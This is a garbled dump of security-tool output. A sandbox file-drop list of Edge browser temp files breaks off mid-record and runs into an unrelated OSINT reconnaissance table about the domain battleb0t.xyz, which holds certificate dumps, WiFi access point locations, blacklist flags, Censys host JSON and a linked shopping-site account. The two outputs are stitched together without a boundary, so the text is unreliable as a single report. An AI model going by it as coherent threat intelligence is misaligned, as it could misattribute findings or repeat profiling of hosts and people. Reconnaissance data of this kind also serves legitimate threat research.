"Filtering Rules" has type "data"- Location: [%TEMP%\\8176_2094895968\\Filtering Rules]- [targetUID: 00000000-00008176]\n "33ed44ec-5fb2-4ac5-bab9-e8b8484c6077.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\33ed44ec-5fb2-4ac5-bab9-e8b8484c6077.tmp]- [targetUID: 00000000-00008176]\n "f5020ad3-bd5d-4b77-9abd-2a7917f51814.tmp" has type "very short file (no magic)"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\f5020ad3-bd5d-4b77-9abd-2a7917f51814.tmp]- [targetUID: 00000000-00008176]\n "e4dc831f-30bb-481e-981e-d3749bdf7a0c.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\e4dc831f-30bb-481e-981e-d3749bdf7a0c.tmp]- [targetUID: 00000000-00008176]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00007284]\n "67fb2784defc193d_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\67fb2784defc193d_0]- [targetUID: 00000000-00008176]\n "temp-index" has type "zlib compressed data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\index-dir\\temp-index]- [targetUID: 00000000-00008176]\n "edge_checkout_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\8176_1447454528\\edge_checkout_page_validator.js]- [targetUID: 00000000-00008176]\n "LOG" has type "ASCII text"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgePushStorageWithConnectTokens\\LOG]- [targetUID: 00000000-00008176]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\8176_1447454528\\edge_driver.js]- [targetUID: 00000000-00008176]\n "shopping.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\8176_1447454528\\shopping.js]- [targetUID: 00000000-00008176]\n "deny_domains.list" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Web Notifications Deny List\\1.1.0.0\\deny_domains.list]- [targetUID: 00000000-00008176]\n "8b9637f5-42d7-41f4-9b8e-b22220cad0c0.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\8b9637f5-42d7-41f4-9b8e-b22220cad0c0.tmp]- [targetUID: 00000000-00006224]\n "Variations" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Variations]- [targetUID: 00000000-00008176]\n "04a120c2-8394-4261-bb45-618676a047cc.tmp" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Ad Blocking\\04a120c2-8394-4261-bb45-618676a047cc.tmp]- [targetUID: 00000000-00008176]'}, {u'category': u'Installation/Persistence', u'origin': u'File/Memory', u'identifier': u'string-184', u'name': u'Found registry | 185.199.109.153 |
| 2023-05-12 03:00:25 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.0): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | ASU (Net ID: 00:06:25:66:88:D8) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | <no ssid> (Net ID: 00:09:5B:6B:72:5C) | 39.0469, -77.4903 |
| 2023-05-12 02:48:30 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:10:8b:16:97:4c:80:e7:56:d7:06:74:1e:45:16:d2:cf:08
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 18 13:27:58 2022 GMT
Not After : Mar 18 13:27:57 2023 GMT
Subject: CN=panel.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:ad:62:80:b3:4a:16:3f:d1:ca:02:76:24:cc:9e:
aa:84:81:39:ce:32:30:eb:2b:8e:c4:10:85:04:e9:
19:e1:2c:8b:f7:58:3e:cb:1c:ff:b5:a4:5e:3a:d3:
5f:cd:9f:7e:93:67:29:42:61:bd:af:c4:d3:ff:2c:
ba:88:7a:06:b8:ee:d1:0b:bb:86:7e:44:8f:c8:6e:
9f:15:1a:80:a4:23:08:22:e4:47:13:58:3b:f2:14:
1e:d6:ab:b0:0d:9a:3d:43:fa:19:c7:62:73:68:d3:
e8:e2:e0:f2:f8:19:08:fa:27:87:9f:f6:00:ca:15:
68:32:25:1a:17:ab:c2:10:cf:ee:c4:5c:e1:5a:4c:
7f:24:75:c4:d7:a8:bb:65:e9:41:ed:b3:2d:c0:d3:
43:15:31:0d:92:7c:15:d2:74:91:60:11:b3:a9:c4:
23:1e:bd:9f:cd:65:52:70:48:15:e3:b8:f4:be:c0:
7b:19:6d:7b:06:84:b9:fd:58:0b:97:47:76:a2:75:
8a:02:5c:f4:a0:74:5a:14:c3:00:00:11:33:ca:09:
cb:4f:f9:83:06:46:d2:9c:09:dd:c0:9e:5b:21:5b:
9d:26:54:f2:ef:8a:39:ff:fb:2e:d5:3b:31:32:7d:
8d:f4:d5:b5:c2:47:2c:44:11:4c:77:93:b1:be:73:
3c:fd:f8:ad:ee:38:c8:cc:7c:fd:93:89:87:7c:f1:
ff:7e:d9:02:fc:16:a4:8b:6d:44:ce:9d:18:99:9a:
80:ce:7f:84:4a:5f:f2:64:78:f3:c5:e5:c6:c7:66:
3e:15:14:9a:10:d3:79:7b:53:46:72:6c:1d:43:1a:
b1:35:e5:15:1e:25:f5:a3:42:b9:f7:c3:cc:11:45:
0d:91:92:d0:7c:af:f5:38:d6:f6:5b:a6:85:e8:1b:
87:47:00:ae:a6:0b:b0:8b:45:d2:80:d3:a6:4d:e2:
fe:d5:6d:a5:c3:c6:cb:5d:f4:1c:79:c6:67:7f:4c:
cd:e5:9e:5e:f5:60:0e:99:47:13:b5:ed:4f:e1:0e:
26:01:e6:84:00:6a:80:a9:fd:0c:5d:16:61:ba:be:
ee:5f:41:8c:41:20:95:45:47:52:41:85:d1:cc:b2:
ba:00:26:e3:48:1b:65:5b:e0:7a:f5:04:7c:c4:32:
1f:ac:c5:99:05:ef:49:b1:5a:de:e3:c4:60:e2:03:
33:84:8a:7a:ad:eb:d2:0c:0c:ff:c4:c2:64:33:29:
15:c7:0a:73:e3:0f:ee:4a:08:a2:6b:f1:e4:95:67:
2f:52:99:fd:3e:6c:01:2d:31:33:10:f6:db:5c:20:
7c:3b:ba:79:4b:c3:c0:d7:a8:e3:f0:e3:c9:f6:e5:
3c:bf:e5
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
A8:1A:0A:B4:5A:C9:CB:04:98:CA:A0:D2:67:45:9B:9C:A4:98:23:12
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:panel.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
9f:12:eb:4c:27:a2:ab:ae:53:fe:36:76:0d:83:48:c0:c4:51:
c2:09:08:23:27:a9:7b:35:32:d3:06:cd:e1:f3:c9:4c:2b:19:
5c:05:3a:7d:46:7b:96:78:c2:2b:09:8f:17:00:fe:1b:3e:53:
fd:3e:2f:c3:9a:b5:30:cd:5b:63:83:4a:da:77:e7:97:a3:c7:
12:1d:4e:2a:c8:68:c9:ed:8a:5e:32:c1:3c:96:1c:3b:30:00:
ed:b7:3d:b1:2e:45:01:68:3f:9d:92:c2:b8:d6:0d:29:ff:f9:
fd:d1:fa:45:c6:29:5f:fe:71:3e:28:8a:cb:d6:9d:51:d9:27:
23:c9:0e:6b:80:7d:c0:dc:b5:f6:e5:58:0d:23:ef:dc:ee:f1:
9f:7c:9d:ea:60:0a:da:5d:a8:81:7a:f0:00:9e:67:b5:ff:9a:
9e:41:d0:47:44:a3:ef:c7:76:fc:d5:d2:2e:9c:0a:d5:6e:f6:
ca:dd:e7:c4:7f:f4:80:04:e6:a2:ea:80:8a:fc:f5:3e:75:14:
53:f6:18:aa:9c:3c:71:e7:0e:04:2f:51:6f:57:cc:c7:59:90:
38:a5:63:c4:16:26:ed:1f:c8:e7:8b:d6:6e:db:f0:07:dd:4e:
a9:fa:5d:63:f8:da:5c:da:d6:9a:39:ad:eb:e5:21:56:13:72:
a3:9a:36:28
| battleb0t.xyz |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fJBUelNZ98yfCYgTc7WNhjysoMluqrTDHq0SVIO%2F0YIAsdqyzhnqcXYutPnufmVGlk%2F%2BT8t3g7wQdFh43VhAxqE%2FmCarJp88icmjJuhwuBRUeOwsppojYEabsQ%3D%3D"}],"group":"cf-nel","max_age":604800} | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=fJBUelNZ98yfCYgTc7WNhjysoMluqrTDHq0SVIO%2F0YIAsdqyzhnqcXYutPnufmVGlk%2F%2BT8t3g7wQdFh43VhAxqE%2FmCarJp88icmjJuhwuBRUeOwsppojYEabsQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c59d97743e3-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ENHLG (Net ID: 00:01:36:5B:37:00) | 37.7642, -122.3993 |
| 2023-05-12 03:01:32 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.75): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:44:14 | Domain Name | No | DNS Resolver | 0 | 0 | 1 | 0 | None | ayhu.xyz | ayhu.xyz |
| 2023-05-12 03:01:37 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.139): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:57 | Netblock IPv6 Membership | No | Censys | 0 | 0 | 2 | 0 | None | 2a06:98c1:3120::/48 | 2a06:98c1:3120::1 |
| 2023-05-12 03:00:31 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | umac-64-etm@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T01:15:51.449Z", "ip": "207.154.228.169", "labels": ["remote-access"], "location_updated_at": "2023-04-26T16:44:53.689109Z", "autonomous_system_updated_at": "2023-04-26T16:44:53.689174Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"demo.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:33.692371432Z"}, "www.gitlab.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-22T18:54:15.274018983Z"}, "www.blog.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:28.495668467Z"}, "sitemap.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-17T14:45:58.102845672Z"}, "mail.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-09T22:38:36.279855979Z"}, "sitemaps.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-27T22:00:34.142966985Z"}, "www.magento.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-25T04:27:35.542554385Z"}, "the.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:05.045794814Z"}, "git.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-18T22:02:08.010914546Z"}, "why.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:50.763792122Z"}, "blog.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:41.064561319Z"}, "pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:33.203437608Z"}, "www.staging.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-27T22:00:31.907335501Z"}, "www.mail.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:15.687219106Z"}, "www.polygon.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:50.199285708Z"}, "www.getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-27T22:00:33.577672224Z"}, "dev.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:03.141552446Z"}, "gitlab.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-22T10:53:09.803238695Z"}, "magento.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-23T23:59:18.482468579Z"}, "abs.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-22T17:03:22.221262680Z"}, "shop.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:40.132954471Z"}, "apk.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:33.628764632Z"}, "www.sitemaps.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:42.479130613Z"}, "store.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:04.021634906Z"}, "www.mail.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-02T14:44:59.299521244Z"}, "blog.getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-26T21:45:12.270323061Z"}, "www.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:51.220733315Z"}, "gitlab.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-22T17:03:25.974047797Z"}, "getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-23T23:59:43.775790789Z"}, "www.test.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:04.458677133Z"}, "www.sitemap.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-23T16:20:35.410578926Z"}, "27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:49.792043016Z"}, "www.27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-26T21:45:11.528325040Z"}, "polygon.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-20T22:28:11.409230997Z"}, "staging.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-23T16:20:15.055432105Z"}, "www.old.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-18T22:01:33.780417520Z"}, "www.gitlab.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:09.056676609Z"}, "the.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:43.060825855Z"}, "mail.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:03.585095495Z"}, "old.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-20T22:28:10.411213800Z"}, "www.shop.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:06.772740465Z"}, "posadisad.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:15.103803419Z"}, "www.git.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-22T17:03:24.300688116Z"}, "app.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:28.045102600Z"}, "www.store.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T16:00:25.103894275Z"}, "on.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:18.198972199Z"}, "www.blog.getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:08.475610608Z"}, "www.dev.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-26T21:44:39.836624314Z"}, "crm.sirket.im": {"record_type": "A", "resolved_at": "2023-05-10T17:17:53.506957947Z"}, "javadfra.softether.net": {"record_type": "A", "resolved_at": "2023-05-09T20:04:58.925278232Z"}, "www.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:18.498526700Z"}, "tsxwdq.easypanel.host": {"record_type": "A", "resolved_at": "2023-04-29T17:33:24.980088481Z"}, "wow.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-20T14:24:20.099465955Z"}, "test.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-20T00:13:37.049342133Z"}, "what.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-17T14:45:49.646289405Z"}, "at.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-13T14:57:51.931938167Z"}, "polygon.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:42.054213831Z"}, "in.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:34.386503067Z"}, "www.polygon.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:34.836285670Z"}, "www.demo.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:02.797080934Z"}, "app.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:06.212849951Z"}}, "names": ["sitemap.posadisad.com", "the.pointlane.com", "shop.pointlane.com", "test.pointlane.com", "www.staging.pointlane.com", "www.blog.getsimnum.posadisad.com", "abs.posadisad.com", "getsimnum.posadisad.com", "in.pointlane.com", "posadisad.com", "magento.pointlane.com", "crm.sirket.im", "mail.pointlane.com", "www.mail.posadisad.com", "staging.pointlane.com", "sitemaps.posadisad.com", "pointlane.com", "www.sitemap.posadisad.com", "blog.getsimnum.posadisad.com", "www.demo.pointlane.com", "demo.pointlane.com", "what.pointlane.com", "www.store.pointlane.com", "www.old.pointlane.com", "www.mail.pointlane.com", "app.pointlane.com", "www.gitlab.pointlane.com", "app.posadisad.com", "27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com", "blog.posadisad.com", "javadfra.softether.net", "at.pointlane.com", "mail.posadisad.com", "polygon.pointlane.com", "git.posadisad.com", "gitlab.posadisad.com", "old.pointlane.com", "wow.posadisad.com", "polygon.posadisad.com", "gitlab.pointlane.com", "apk.pointlane.com", "www.magento.pointlane.com", "www.polygon.pointlane.com", "dev.pointlane.com", "www.27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com", "the.posadisad.com", "www.blog.posadisad.com", "store.pointlane.com", "www.dev.pointlane.com", "www.getsimnum.posadisad.com", "why.posadisad.com", "www.test.pointlane.com", "www.shop.pointlane.com", "on.pointlane.com", "www.polygon.posadisad.com", "tsxwdq.easypanel.host", "www.posadisad.com", "www.gitlab.posadisad.com", "www.git.posadisad.com", "www.sitemaps.posadisad.com", "www.pointlane.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.248.133.49", "extended_service_name": "SSH", "observed_at": "2023-05-11T01:15:50.786715445Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_NTT", "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "547dbd625a27506b11586280f4a822637523e4a0ab006b506caadd882fb07151", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "8oJhdPmy3h9TMJvWg4Uf9bFwsyMd8Wzn2vYjEAGHvAA=", "x": "+yukgG2Uj68iboVSBhBnXM3KU5F0vU7GhjX/PobpTIQ=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sh |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Poshmark (Category: shopping)
https://poshmark.com/closet/ayhu | ayhu |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | cable (Net ID: 00:02:2D:2F:C6:B5) | 37.7642, -122.3993 |
| 2023-05-12 03:13:06 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [007joshie.github.io]
https://www.openphish.com/feed.txt | 007joshie.github.io |
| 2023-05-12 03:01:18 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.154): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:44:05 | SSL Certificate - Raw Data | No | CertSpotter | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:3a:9d:01:de:8f:db:a2:52:4a:02:0c:18:70:da:44:dd:bc
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 13 12:50:47 2023 GMT
Not After : Jun 11 12:50:46 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:ae:86:d1:c6:73:d4:68:16:b7:b8:27:02:2e:0a:
3b:ac:b2:c0:cf:5d:bb:e0:97:62:4b:2d:4c:a7:8a:
0f:bb:28:62:25:f7:8b:c2:a2:9f:9f:a4:09:ae:64:
46:ad:01:04:9a:1c:e2:d3:da:ff:2f:0b:66:3e:17:
93:38:08:7c:21:35:76:62:9b:3d:79:67:17:13:fe:
36:e3:cb:d3:f1:13:27:de:39:d4:be:26:b9:a7:bc:
48:6c:32:02:59:5e:42:77:18:cd:f0:52:6e:ff:59:
03:7e:1d:11:be:bc:ab:d2:7f:d2:95:33:32:9e:74:
fe:3f:8c:4e:e3:30:bd:bb:06:89:38:c8:e8:4f:53:
3b:f6:63:c0:62:08:06:0e:e7:94:7f:f0:60:db:70:
ea:7f:78:d5:b9:6c:e0:49:a6:b4:37:75:b0:52:59:
b3:35:96:ab:99:46:f4:69:22:fd:0c:96:69:7a:42:
ab:47:42:08:6b:5e:8a:9a:4d:97:23:10:94:f7:79:
b4:c3:5e:97:52:71:2a:e0:cb:16:4d:05:9d:0a:4b:
32:05:28:18:33:7b:d6:34:6c:b7:3e:5b:ab:cb:54:
41:54:0f:0b:fa:c3:ea:b8:4b:80:0a:8e:f0:90:cd:
32:45:6e:24:6b:2b:da:60:08:2e:69:e6:59:89:a4:
25:87:82:03:c6:3c:bd:7c:46:55:91:56:df:8c:10:
3f:c4:bc:32:26:aa:2e:b1:d8:86:87:bf:32:be:e7:
49:d8:74:e0:99:42:34:64:c2:23:25:06:06:47:62:
f1:32:ce:42:2e:0b:a1:5c:5c:7d:55:6f:f5:43:b6:
4a:13:84:0e:20:9b:ad:e4:75:cf:98:ec:28:ca:d5:
97:e8:15:83:85:e3:c5:d8:e3:28:87:31:07:5e:2c:
11:d9:8a:d6:52:d3:ed:87:7d:ab:aa:dd:63:d0:48:
bb:c8:d0:2e:7e:92:84:13:37:53:61:b8:ec:ac:9a:
86:7b:ce:3f:d2:40:f0:db:6c:2c:1e:97:3b:c5:cb:
35:b4:86:6e:2c:94:d1:aa:dc:d2:87:31:ab:38:c5:
f4:27:1d:0a:25:44:99:80:36:03:ce:91:80:1c:d1:
59:d4:7c:5a:37:1b:0a:ce:f5:f1:c0:65:43:fc:ee:
ed:8e:bc:b1:d6:9d:85:ca:8e:38:b3:e3:c0:7f:97:
a5:98:eb:15:ff:cd:24:e7:6d:15:4d:57:89:17:a7:
5f:b4:d5:d3:b7:8f:07:9c:a8:ea:76:1e:e7:f3:2c:
9b:59:ae:2b:2b:2c:ad:9d:e2:f1:8d:94:c2:23:8f:
a7:4d:67:84:e7:2f:fb:e0:0a:d2:eb:7c:d9:ee:92:
a6:63:7b
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
20:59:35:73:F8:CD:0E:84:44:DD:6F:B0:C2:B9:45:18:98:00:40:7B
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Mar 13 13:50:48.097 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:CF:17:8C:E7:5C:85:D2:35:C0:73:1C:
DD:DC:CB:6A:69:22:6C:11:CA:4A:7A:70:E6:41:98:64:
C2:D6:EB:16:05:02:21:00:BB:55:01:DF:9D:AA:0D:1D:
85:02:D9:76:FB:4F:6B:D6:D8:8F:94:82:00:A7:D0:65:
5A:13:BE:6C:BF:BD:5B:9D
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Mar 13 13:50:48.131 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:AF:43:46:DF:38:C8:21:CA:47:16:D3:
84:F0:B4:A9:1B:09:0F:BB:55:58:89:44:1F:3A:9E:8A:
